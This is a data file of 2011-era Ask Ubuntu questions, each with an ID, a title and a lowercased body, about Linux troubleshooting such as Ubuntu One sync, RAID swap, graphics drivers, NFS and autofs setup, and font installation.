55539	couchdb issues with evolution v u1	okay , im pretty versed with couch on a mac and i know its the same sort of system on ubuntu however i have a major issue . my contacts database corrupted in the sense that it lost everything in ubuntuone and then deleted it all in evolution . see the system works lol tried to delete the local database using wget http : //people.canonical.com/~roman.yepishev/us/desktopcouch-admin.py python desktopcouch-admin.py -- drop this worked fine however purging the server end using this wget http : //people.canonical.com/~roman.yepishev/us/ubuntuone-couchdb-query python ubuntuone-couchdb-query -- http-method=delete contacts i get this : christopher @ christopher-compaq-mini-110c-1100 : /tmp $ python ubuntuone- couchdb-query -- http-method=delete contacts traceback ( most recent call last ) : file `` ubuntuone-couchdb-query '' , line 269 , in < module > application.run ( args [ 0 ] , options ) file `` ubuntuone-couchdb-query '' , line 148 , in run self.main ( url , options ) file `` ubuntuone-couchdb-query '' , line 153 , in main show_tokens=options.show_tokens , show_account=options.show_account ) file `` ubuntuone-couchdb-query '' , line 207 , in request `` % r '' % ( resp [ 'status ' ] , content ) ) exception : there was a problem processing the request : status:503 , response : ' < ! doctype html public `` -//ietf//dtd < br > html 2.0//en '' > \n < html > < head > \n < title > 503 service temporarily unavailable < /title > \n < /head > < body > \n < h1 > service temporarily unavailable < /h1 > \n < p > the server is temporarily unable to service your\nrequest due to maintenance downtime or capacity\nproblems . please try again later. < /p > \n < p > additionally , a 404 not found\nerror was encountered while trying to use an errordocument to handle the request. < /p > \n < hr > \n < address > apache/2.2.14 ( ubuntu ) server at couchdb.one.ubuntu.com port 443 < /address > \n < /body > < /html > \n' i have logged in to futon and checked the database and i have an empty contacts database with 0kb however in evolution i have contacts ? is there a way to rebuild the databases or create a new link to a new database between u1 - couchdb - evolution ?
55540	burning audio cd for stereo cd player	i 'd like to burn mp3 files to an audio cd . i tried k3b , but it just burns wav files to the cd-rom . as far as i know , a regular stereo cd player will only play cda format . the end result files must play on a regular stereo cd player . any suggestions/ideas are appreciated .
55542	ubuntu ca n't mount swap from raid1	i have just built a new server to host a minecraft server . i have two hdds that are in hardware raid 1 , and i have installed ubuntu server 11.04 on those disks . my problem is that anytime i reboot i get this error message the disk drive for /dev/mapper/nvidia_dhecicai5 is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery this is my /etc/fstab proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/nvidia_dhecicai1 / ext4 errors=remount-ro 0 1 /dev/mapper/nvidia_dhecicai5 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 ramdisk /mnt/ramdisk tmpfs mode=1777 , size=2g 0 0 if comment out the first swap line i get the same error message with cryptswap1 , and if i comment out both the system boots fine . i have 8g of ram in the system , so it should work fine without swap , but it 's kind of an ugly solution . i probably could get rid of the cryptswap1 swap by reinstalling without encrypted home folders , but i 'm pretty sure it 's the same problem . this is my output from blkid /dev/sda : type= '' nvidia_raid_member '' /dev/sdb : type= '' nvidia_raid_member '' /dev/mapper/nvidia_dhecicai1 : uuid= '' 28a0d47a-8a42-4a7d-83f4-09d89b206901 '' type= '' ext4 ''
55544	microsoft office 2007 in wine will not check spelling & grammar in portuguese	i 'm using microsoft office 2007 installed with playonlinux ( wine ) , it 's working all fine , except that it will not check spelling & grammar in portuguese ( brazil ) . the spelling check in english occurs perfectly . in portuguese it says that all is right , even when it 's not . it 's like it just accept everything i write as correct . any idea how to solve this ? does wine support the ms office 's spelling check feature at all ? -- update : just realized that the spelling check also is not working on libre office for my language ( portuguese , brazil ) , maybe the problem is bigger then i thought .
55546	how do i install svn ?	i am trying to install svn and am running into issues . the command i am running is sudo apt-get install svn . when i run this , i get the error `` unable to locate package svn '' . why is this ? how do i fix it ?
55547	unity bug on lock screen	i am currently using ubuntu 11.04/natty under virtualbox 4.0.12 with unity-2d . i have guest additions installed . i am not sure if this is virtualbox-specific , but here is the problem : after locking the screen , pressing the windows key on the keyboard brings the unity launcher on top of the lock screen . pressing the windows key again removes the launcher panel but the desktop remains visible where the menu was . you can not interact with the desktop but you can see what the user was doing . i was not easily able to bring the login panel from the lock screen back but tabbing through the buttons/field brought them back . this problem seems intermittent . i was able to get it to reproduce in the same manner several times but then it became random . this definitely appears to be a bug , but is it a ubuntu bug or a virtualbox bug ? the following links are to screenshots , the first being the unity launcher under the lock screen and the second being the exposed desktop after unity is closed .
55549	run the same browser on two different desktop instances ?	with my two-video-card setup i 'm currently forced to run two non-xinerama desktops side-by-side , each with their own gnome-panels . ( when i move my mouse off the edge of one , input focus changes to the next one . ) additionally , sometimes i remote login to a desktop computer and i have two desktops running : one on the console and one connected to the remote terminal . in both cases , i have not found a web browser that execute on both desktops at the same time . you may have exactly one instance per user per profile , and that instance runs on exactly one desktop -- not two or more . the only workaround is to run different browser profiles on each desktop ( i.e . `` firefox -profile $ path-of-second-profile '' ) and these separate profiles of course never share any data with each other . i find this multiple-instance restriction with opera , firefox , chrome , midori , and konquerer and at this point i 've given up . in contrast , tools like gnome-panel , gnome-terminal , nautilus , thunar , gedit , and okular are happy to run multiple instances on different desktops simultaneously . is there a browser out there that supports what i want , and fully supports javascript , java , and flash ?
55551	how can i force ubuntu to boot on a stuck boot menu ?	i have ubuntu server 11.04 , but it is headless ( no monitor ) . the only way i want to be able to access it is remotely via ssh . but , sometimes , say after a power loss , when the server restarts , it will get stuck on the grub boot menu , and it wo n't count down . it will just hang there waiting for me to choose the first boot entry . this means i have to go there and plug in a monitor and keyboard . but i ca n't do that remotely . how can i force it to continue booting to boot entry 1 ( default ) regardless of power loss or whatever ?
55552	i accidentally overwrite /etc/bash.bashrc file . please give the default content	i accidentally overwrote the /etc/bash.bashrc file . please give me the default content in that file to restore , or the file itself .
55556	ca n't find wireless networks	every time i go out of sleep mode ubuntu is disconnected from the internet , which i get , but when i go to reconnect to my router , it ca n't find any wireless networks at all and it says `` device not ready '' under the blacked out `` wireless networks '' i 'm using a realtek wireless adapter built into the computer and i 'm aware it 's not the most favorable one for use in ubuntu but i 've installed the driver software and everything . any ideas on how to fix it ?
55559	not able to start my laptop after nvidia driver install	i have a dell inspiron n5110 , with i5 , 4gb ram and nvidia gt525 graphic card . i installed ubuntu 11.04 . it was working fine with unity . then in additional driver i installed the recommended nvidia drivers . none of the nvidia drivers being used at that moment . next i restart to complete the driver installation as mentioned . now the problem is after i pass the grub screen nothing happens and the caps lock key keeps on blinking . i even tried to start into recovery mode , there also i 'm unable to boot into linux . the only thing i can do is boot into linux via previous kernel install of the linux , from the grub menu .
55560	ubuntu one for other linux distributions ?	i 'm using mageia linux on one of my computers and i would like to sync with my ubuntu one account , is this possible ?
55564	how to mount my d-link dns 323 nas	i have ubuntu 11.04 64bit . i cant connect my dns 323 `` nas '' . i only see the ip `` 169.254.6.199 '' on my router . i use nautilus `` smb : //169.254.6.199 '' and only see message `` could not display `` smb : //169.254.6.199/ '' .
55568	`` could not update iceauthority file '' after login ( independent of gnome )	i just installed ubuntu 11.04 64bits in my new computer , and i got this two messages after login : and i 've tried to login with classic gnome , and safe mode , but got the same messages . any easy/fast solution to this ? ( if not i can use ubuntu 10.10 for while ) my computer is an hp pavilion , intel i3 , 4gm ram .
55570	problem upgrading ubuntu 9.10	i 've been trying to upgrade my version on ubuntu from 9.10 to 10.04 ( and eventually to the latest ) , but i 'm having trouble with broken packages . i 've tried : apt-get update apt-get upgrade apt-get dist-upgrade dpkg -- configure -a ( not sure why ) i 'm not sure what 's relevant , so i 'm going to dump what i 've got : output from upgrade attempt : $ sudo do-release-upgrade checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading extracting 'lucid.tar.gz' authenticate 'lucid.tar.gz ' against 'lucid.tar.gz.gpg ' tar : removing leading `/ ' from member names reading cache checking package manager reading package lists : done reading state information : done reading state information : done reading state information : done done downloading reading package lists : done reading state information : done reading state information : done reading state information : done updating repository information warning : failed to read mirror file done downloading checking package manager reading package lists : donelucid-security/multiverse packages : 96 gutsy/restricted packages : 02 reading state information : done reading state information : done reading state information : done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . restoring original system state aborting reading package lists : donekarmic-security/multiverse packages : 95 utsy/restricted packages : 02 reading state information : done reading state information : done reading state information : done /etc/apt/sources.list ( with most of the comments stripped ) $ cat sources.list # deb cdrom : [ ubuntu 9.10 _karmic koala_ - release i386 ( 20091028.5 ) ] / karmic main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb cdrom : [ ubuntu-server 7.10 _gutsy gibbon_ - release i386 ( 20071016 ) ] / gutsy main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic universe deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic universe deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ karmic multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic multiverse deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates multiverse # deb http : //us.archive.ubuntu.com/ubuntu/ karmic-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-backports main restricted universe multiverse # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu karmic partner deb-src http : //archive.canonical.com/ubuntu karmic partner deb http : //security.ubuntu.com/ubuntu karmic-security main restricted deb-src http : //security.ubuntu.com/ubuntu karmic-security main restricted deb http : //security.ubuntu.com/ubuntu karmic-security universe deb-src http : //security.ubuntu.com/ubuntu karmic-security universe deb http : //security.ubuntu.com/ubuntu karmic-security multiverse deb-src http : //security.ubuntu.com/ubuntu karmic-security multiverse # # packages for chrome # deb http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main # deb-src http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main # # latest php packages # deb http : //php53.dotdeb.org stable all # deb-src http : //php53.dotdeb.org stable all # deb http : //security.ubuntu.com/ubuntu jaunty-security main the last few lines of /var/log/dist-upgrade/main.log 2011-08-02 19:21:54,211 debug entry 'deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse ' updated to new dist 2011-08-02 19:21:54,246 debug running doupdate ( ) ( showerrors=true ) 2011-08-02 19:22:24,895 debug opencache ( ) 2011-08-02 19:22:24,895 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-02 19:22:29,991 debug /opencache ( ) , new cache size 30853 2011-08-02 19:22:29,991 debug needservermode ( ) : run in 'desktop ' mode , ( because of pkg 'ubuntu-desktop ' ) 2011-08-02 19:26:29,025 debug installing 'upstart-logd ' ( priority in required set 'required ' but not scheduled for install ) 2011-08-02 19:26:30,695 error dist-upgrade failed : 'e : unable to correct problems , you have held broken packages . ' 2011-08-02 19:26:30,696 debug abort called 2011-08-02 19:26:30,697 debug opencache ( ) 2011-08-02 19:26:30,698 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-02 19:26:33,728 debug /opencache ( ) , new cache size 29182 2011-08-02 19:26:33,728 debug enabling apt cron job ( thanks )
55571	repeated long command in gnome-terminal do not show up in full	let 's say i type a shell command in gnome-terminal/bash that spans multiple lines and run it . shell > abcdef ghijk lmn opq rstuv wxyz then when i want to run the same command again , i hit the up-arrow . instead of seeing the same command again ( which always used to be the case ) , gnome-terminal now only shows me parts of the last line with a < at the beginning of the line : < stuv wxyz that is , no prompt , just that line . if i hit ctrl-a at that point , i will get the first line of the original command with a > at the end . shell > abcdef ghijk l > here , the prompt is back . how can i configure my setup so that hitting the up-arrow after a long command will simply display the complete long command again , spanning multiple lines and including the prompt ?
55572	how do i decide which ppa to use ?	i 'm looking for a ppa for ruby 1.9.2 for lucid lynx , and i 've noticed that there 's a couple of them . is it possible to determine which one is more commonly used , and therefore more likely to be error-free ?
55575	problem upgrading ubuntu 9.10	i 've been trying to upgrade my version on ubuntu from 9.10 to 10.04 ( and eventually to the latest ) , but i 'm having trouble with broken packages . i 've tried : apt-get update apt-get upgrade apt-get dist-upgrade dpkg -- configure -a ( not sure why ) i 'm not sure what 's relevant , so i 'm going to dump what i 've got : output from upgrade attempt : $ sudo do-release-upgrade checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading extracting 'lucid.tar.gz' authenticate 'lucid.tar.gz ' against 'lucid.tar.gz.gpg ' tar : removing leading `/ ' from member names reading cache checking package manager reading package lists : done reading state information : done reading state information : done reading state information : done done downloading reading package lists : done reading state information : done reading state information : done reading state information : done updating repository information warning : failed to read mirror file done downloading checking package manager reading package lists : donelucid-security/multiverse packages : 96 gutsy/restricted packages : 02 reading state information : done reading state information : done reading state information : done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . restoring original system state aborting reading package lists : donekarmic-security/multiverse packages : 95 utsy/restricted packages : 02 reading state information : done reading state information : done reading state information : done /etc/apt/sources.list ( with most of the comments stripped ) $ cat sources.list # deb cdrom : [ ubuntu 9.10 _karmic koala_ - release i386 ( 20091028.5 ) ] / karmic main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb cdrom : [ ubuntu-server 7.10 _gutsy gibbon_ - release i386 ( 20071016 ) ] / gutsy main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ karmic universe deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic universe deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ karmic multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic multiverse deb http : //us.archive.ubuntu.com/ubuntu/ karmic-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-updates multiverse # deb http : //us.archive.ubuntu.com/ubuntu/ karmic-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ karmic-backports main restricted universe multiverse # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu karmic partner deb-src http : //archive.canonical.com/ubuntu karmic partner deb http : //security.ubuntu.com/ubuntu karmic-security main restricted deb-src http : //security.ubuntu.com/ubuntu karmic-security main restricted deb http : //security.ubuntu.com/ubuntu karmic-security universe deb-src http : //security.ubuntu.com/ubuntu karmic-security universe deb http : //security.ubuntu.com/ubuntu karmic-security multiverse deb-src http : //security.ubuntu.com/ubuntu karmic-security multiverse # # packages for chrome # deb http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main # deb-src http : //ppa.launchpad.net/chromium-daily/ppa/ubuntu karmic main # # latest php packages # deb http : //php53.dotdeb.org stable all # deb-src http : //php53.dotdeb.org stable all # deb http : //security.ubuntu.com/ubuntu jaunty-security main the last few lines of /var/log/dist-upgrade/main.log 2011-08-02 19:21:54,211 debug entry 'deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse ' updated to new dist 2011-08-02 19:21:54,246 debug running doupdate ( ) ( showerrors=true ) 2011-08-02 19:22:24,895 debug opencache ( ) 2011-08-02 19:22:24,895 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-02 19:22:29,991 debug /opencache ( ) , new cache size 30853 2011-08-02 19:22:29,991 debug needservermode ( ) : run in 'desktop ' mode , ( because of pkg 'ubuntu-desktop ' ) 2011-08-02 19:26:29,025 debug installing 'upstart-logd ' ( priority in required set 'required ' but not scheduled for install ) 2011-08-02 19:26:30,695 error dist-upgrade failed : 'e : unable to correct problems , you have held broken packages . ' 2011-08-02 19:26:30,696 debug abort called 2011-08-02 19:26:30,697 debug opencache ( ) 2011-08-02 19:26:30,698 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-02 19:26:33,728 debug /opencache ( ) , new cache size 29182 2011-08-02 19:26:33,728 debug enabling apt cron job
55583	accessing other partition from the command-line immediately on startup	my other hard drive partition ( i.e. , the windows partition ) is located in /media/os . however , i do n't seem to be able to access it from the command line when my machine starts up in ubuntu . i have to first open nautilus and then click on the drive . only then can i access the drive from the command line . what is a simple way to ensure that the partition is always accessible from the command-line ? i thought perhaps there might be some simple command that i could add to the list of `` startup applications '' .
55587	prevent files from losing focus in nautilus ?	one of my pet peeves in ubuntu : i open up a folder with ~50 files in it . i start typing in the file name , and it matches something . i notice that the file i want is right beside it . i press the right arrow ... nothing happens . i press it again , thinking it was a mis-press ... still nothing happens . nothing happens until i press escape , and then select the file -- because the incremental search box has grabbed the focus . is there any way to fix this ?
55588	how to use unity dash in gnome classic ?	i am wondering if there is a way to use unity dashboard in gnome-classic ? if yes , what are the dependency packages need to be installed ? update : or is there any app could do that ?
55590	how to startx with `` -logverbose 6 '' arguments ?	how do i pass the -logverbose 6 arguments to startx ? it is necessary for submitting a bug report to nvidia support .
55597	ca n't browse the internet nor ping a host , but dig works	i am not able to browse any websites . please take a look at the following error : karthick @ karthick : ~ $ ping www.google.com ping : unknown host www.google.com update karthick @ karthick : ~ $ dig www.google.com ; < < > > dig 9.7.1-p2 < < > > www.google.com ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 26402 ; ; flags : qr rd ra ; query : 1 , answer : 6 , authority : 4 , additional : 4 ; ; question section : ; www.google.com . in a ; ; answer section : www.google.com . 238583 in cname www.l.google.com . www.l.google.com . 97 in a 74.125.236.50 www.l.google.com . 97 in a 74.125.236.48 www.l.google.com . 97 in a 74.125.236.52 www.l.google.com . 97 in a 74.125.236.49 www.l.google.com . 97 in a 74.125.236.51 ; ; authority section : google.com . 146866 in ns ns3.google.com . google.com . 146866 in ns ns2.google.com . google.com . 146866 in ns ns1.google.com . google.com . 146866 in ns ns4.google.com . ; ; additional section : ns2.google.com . 317814 in a 216.239.34.10 ns1.google.com . 317814 in a 216.239.32.10 ns3.google.com . 317814 in a 216.239.36.10 ns4.google.com . 317814 in a 216.239.38.10 ; ; query time : 5 msec ; ; server : 172.29.39.212 # 53 ( 172.29.39.212 ) ; ; when : wed aug 3 15:30:38 2011 ; ; msg size rcvd : 268 output : karthick @ karthick : ~ $ ifconfig eth0 link encap : ethernet hwaddr bc:30:5b : c4 : fd : dc inet addr:172.29.xx.xx bcast:172.29.xx.xxx mask:255.255.255.0 inet6 addr : fe80 : :be30:5bff : fec4 : fddc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1757954 errors:0 dropped:0 overruns:0 frame:0 tx packets:1422948 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1329324192 ( 1.3 gb ) tx bytes:1231317787 ( 1.2 gb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:10528 errors:0 dropped:0 overruns:0 frame:0 tx packets:10528 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:768164 ( 768.1 kb ) tx bytes:768164 ( 768.1 kb ) karthick @ karthick : ~ $ sudo iptables -nvl [ sudo ] password for karthick : chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination
55600	error in trac setup	i 'm trying to setup a trac , i entered the following lines < location /trac/ [ [ : alnum ] ] +/login '' > authtype basic authname `` subversion repository '' authuserfile /etc/apache2/dav_svn.passwd require valid-user < /location > < location /trac > sethandler mod_python pythoninterpreter main_interpreter pythonhandler trac.web.modpython_frontend pythonoption tracenvparentdir /var/www/trac pythonoption tracuriroot /trac < /location > in this file , /etc/apache2/sites-enabled/000-default but when i 'm trying to restart the apache server , i 'm getting the following error : syntax error on line 50 of /etc/apache2/sites-enabled/000-default : invalid command 'pythoninterpreter ' , perhaps misspelled or defined by a module not included in the server configuration
55606	getting 'permission denied error ' with wget	i installed the lamp stack on my ubuntu 11.04 ( natty narwhal ) with sudo apt-get install lamp-server^ now i navigate to /var/www and use wget http : //ftp.drupal.org/files/projects/drupal-7.x-dev.tar.gz i get the following error . -- 2011-08-03 13:59:00 -- http : //ftp.drupal.org/files/projects/drupal-7.x-dev.tar.gz resolving ftp.drupal.org ... 64.50.233.100 , 64.50.236.52 connecting to ftp.drupal.org|64.50.233.100|:80 ... connected . http request sent , awaiting response ... 200 ok length : 2757101 ( 2.6m ) [ application/x-gzip ] drupal-7.x-dev.tar.gz : permission denied can not write to `drupal-7.x-dev.tar.gz ' ( permission denied ) . how do i resolve this error ? i tried to download the same file in the downloads folder , and it went on without an issue . so it seems to be some permission error , but i 'm not sure about that or how to solve it .
55609	how do i check system specifications ?	i am total noob in linux . i wan na know what is the equivalent of `` my computer '' in ubuntu 11.04 . i want to check my computer specs such as processor speed , memory , and etc . whenever i check properties in home folder it only gives me the hd capacity . i also tried looking at system settings but i ca n't find it there . please help .
55610	how to open evince in the top-right corner of my screen ?	i want to open a new evince window on the top-right corner of my screen , how can i do that in ubuntu 11.04 with no unity , but the old window manager system ?
55611	a text editor or viewer with folding based on indentation	i 'm trying to get a better understanding of the *.dsl files as disassembled by the iasl program . those files looks like : /* * a comment */ stuff { more stuff { beer ( a , b ) // another comment } hmm ( mmm ) { package ( 0x04 ) { 0xffff } , package ( 0x04 ) { 0xffff } } meh ( x , y ) } this syntax should be really easy for a text viewer / editor . since i 'm just viewing these files , the editing feature is not needed . the file has 11k lines which makes it more difficult to scan for text . is there a lightweight text viewer with folding capabilities ? both cli and gui solutions are welcome . addition : i would like to have the next features too : shortcuts to jump from the child to the parent ( e.g . beer to more stuff or the { next to it ) quick search ( till now , i used less in which i can search by pressing / followed by the search term and enter . the firefox `` on the bottom search '' bar is something that i would like to see for a gui program ) bonus : hiding blocks of text the purpose of the viewer is getting me through the text file faster .
55615	unity does not work with catalyst 11.7	two days ago i upgraded my kernel to 3.0.0-7 and the catalyst to 11.7 . since then unity is n't working anymore . the error message is something like : your hardware is n't capable to use unity , switching to classic login .
55623	additional file system and mount at boot time ?	i am new to ubuntu , and i would need you guys help . i installed ubuntu server 10.04 64-bit , and i would like to know : what are the commands to add an additional file system and make sure it mount at the boot time . lets say i want to make it on /newcontent directory ? and on the root disk , i would like to create 2 additional directories called /mybackup and /mydatabases ?
55624	ubuntu and ntfs copying failed	i have 2 partitions on my ubuntu 10.10 , one is ext4 for the system , another is ntfs for my data . while copying my files from my flash disk to ntfs partition ( via terminal cp -r command ) , the light has turned off , and now i am unable to mount my ntfs partition , it says that : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sda6 on /media/sda6 when i try to check for errors it says that : file system is clear some advices ? output of sudo fdisk -l : device boot start end blocks id system /dev/sda1 * 1 6201 49803264 83 linux /dev/sda2 6201 60802 438580225 5 extended /dev/sda5 6201 6325 999424 82 linux swap / solaris /dev/sda6 6326 60802 437579776 7 hpfs/ntfs device boot start end blocks id system /dev/sdb1 1 121602 976762583+ ee gpt
55625	what should i consider when purchasing a ( flatbed ) scanner ?	i 'm considering purchasing a new usb flatbed scanner for my parents whose laptop is running ubuntu ( 10.04 lts - lucid lynx ) . doing a quick search around i found this thread over in the forums : lightweight scanner and it seems : generally i should check the sane project to see if a specific scanner will work under linux . epson distributes its own linux drivers by avasys hp seems to have good linux support : hplip is already installed with ubuntu ( although for me here it seems that the version with ubuntu 10.04 is n't the newest one and could need some fiddling when i buy a new hp printer ) what other factors need i take into account when buying a scanner for ubuntu ? anything specific to some applications ( gimp , etc. ) ? will the now-typical scanner buttons to directly scan a pdf document work on some printers and not on others ? etc .
55626	right click copy contents of file to clipboard	i have a collection of small text files that i often want to copy wholesale into , say emails or the like . ideally i 'd like to add an option to the right click menu for these small text files that copies the whole contents of the file to clipboard ready to be pasted . or is there some smarter gadget that could manage these snippets ? it has to be something that can paste the text into arbitrary texboxes : in firefox , in thunderbird , in emacs ... is there such a tool ?
55627	how to export file system to client ?	i am learning to use ubuntu . i have/just installed 2 ubuntu server 10.04 . i want to make such that , 1 act as a server and the other 1 as a client . i would like to know : how to export file system to client ? by edit the /etc/exports file ? i want to export /newcontent , /mybackup and /mydatabases to my nfs client ( use any nfs options on the export ) . once done that , on client side , how do i test if i do it correctly ? ? thanks .
55628	how to do create an auto mounter ?	i am new to ubuntu and i need some help here . i want to mount the file systems using auto mounter . how to create a new autofs map ( lets call it auto.mydocuments ) with a mount point of /mydocuments ? and the auto.mydocuments map should mount following directories : /newcontent , /mybackup and /mydatabases as descendants of /mydocuments . thanks in advanced .
55630	can i improve hd video playback for an nvidia card ?	i 'm using a nvidia card with the proprietary drivers , it can play hd videos but lags . is there a way to buffer frames or something ? fx 5500 , 173.xx ( legacy , the new version does not support this card ) seeking smooth hd playback on gstreamer-based players .
55633	desktop always in ubuntu classic mode	my friend installed ubuntu 11.04 . we are pretty sure it 's ubuntu 11.04 . he looked at about ubuntu zone . the problem is that the desktop is always like ubuntu classic . when logging , i said ; change the ubuntu classic to ubuntu . however he said it 's already ubuntu . btw he says my gnome version is 2.32 maybe 2.34 . what we can do ?
55634	how to install radeon x600 driver	i am completely new to ubuntu and now running into so many problems regarding my display . i will be so grateful to the community to help me out and keep me loving ubuntu . when i run lspci | grep vga i get the following output 01:00.0 vga compatible controller : ati technologies inc rv380 [ radeon x600 ( pcie ) ] i am not sure if it means the driver is installed . now the problem is i can not change the resolution like i can do in windows . i wanted to use dual monitor but it can not detect dual monitor . the monitor option in the preference shows 'unknown' i tried to use a vga switch for my ps3 and computer , but the computer is stuck with 1024x768 resolution . i have been trying for last three days , could n't figure out anything . now asking for you wisdom to get my display work . regards , mmrahman
55635	black screen after purple ubuntu screen	my friend installed ubuntu via wubi . he says when i select ubuntu from grub menu , i see ubuntu logo . one of the orange points turns into white and then there is empty black screen . what 's wrong ?
55638	how do i type β with combining circumflex accent ?	there 's combining circumflex accent , u+0302 ( in the combining diacritical marks block ) . neither it nor the letter β are on my keyboard . how do i combine the two to write `` beta hat '' like this when i ca n't use tex ?
55640	ubuntu 11.04 mini boots to black screen , alt-f2 restores monitor image .	i installed ubuntu 11.04 mini cd , a command line only version of ubuntu . when the machine boots , i see all the bios screens , but when it boots in to ubuntu the screen goes black . the monitor light is green , but pressing keys . the screen is black . i tried pressing alt-f2 and the screen is restored . i can see the normal ubuntu cli login prompt . what is alt-f2 doing to bring video back and how can i have it boot up that way to begin with ? for reference , this is an ibm eserver 8676-41x machine .
55642	will my ubuntu one account expire if i do n't use it regularly ?	as happens with webmail emails after a certain time without access to the account , these are removed , is this the same with ubuntu one , and what length of time would an account have to be inactive for it to be closed ? thank you very much in advance and best regards .
55643	install ms truetype fonts system-wide for all users	i would like to install the ms truetype fonts that come through the package ttf-mscorefonts-installer , so i did : sudo apt-get install ttf-mscorefonts-installer accepting the license , the process completes without any errors . the fonts end up in /usr/share/fonts/truetype/msttcorefonts as expected . just to be sure , i also did a sudo fc-cache -f -s -v which among other things says in its output : /usr/share/fonts/truetype/msttcorefonts : caching , new cache contents : 60 fonts , 0 dirs so far , so good ( and inline with question how do i install fonts ? ) however , when i then open any font dialog ( e.g . in openoffice or the font dialog of the terminal ) i do n't see all of the new fonts . for arial , the standard form is missing , but bold and italic are there . times new roman is missing altogether . i can use nautilus to browse to the font directory , double click the arial.ttf file and see the font in all its beauty . i can even click the install button then and the font is copied over to my personal ./fonts directory and from there on visible to my apps . but it is not picked up from the system directory . how do i get these fonts available system-wide for all users ?
55647	does the linksys secure easy setup ( ses ) button work with ubuntu ?	does the linksys secure easy setup ( ses ) button work with ubuntu ? i 'm housesitting for someone tonight , and when i asked what their wireless password was , they told me about the ses button they press on the router .
55649	why the old packages are still available in the official software center ?	netbeans ide is still 6.9 in ubuntu center , but the current version is 7.0.1 eclipse ide is still 3.5 in ubuntu center , but the current version is 3.7 i think there are many old ( un-updated ) packages available in software center . just noticed only the two . my question is : if they are not updated there ppa , why ubuntu keeps them in the official software center ?
55653	how to associate file extension ( not file type ) for a particular application ?	i use taskcoach to create a list of my tasks . the data i entered was saved , say , in tasks.tsk on my desktop . internally , this is an xml file of specific structure . now whenever i open it , it opens in my text editor , like any other xml . i 've tried changing extension to .task and .my_tasks , but associated program is the still the editor . after googling and reading forums , i 've right-clicked the file , and in properties - > open with chose taskcoach . the file opens in taskcoach , but any other .xml file gets opened with taskcoach too ! q : how do i make ubuntu open .task files in taskcoach while preserving association .xml - > editor ?
55656	open nautilus as new tab in existing window	currently , if i click a launcher/shortcut icon etc i will get a new nautilus window . if there is already a nautilus window open , i would rather it open up in a new tab in the existing window ( as if i had gone ctrl+t and browsed to the new location ) . how can i make this happen ?
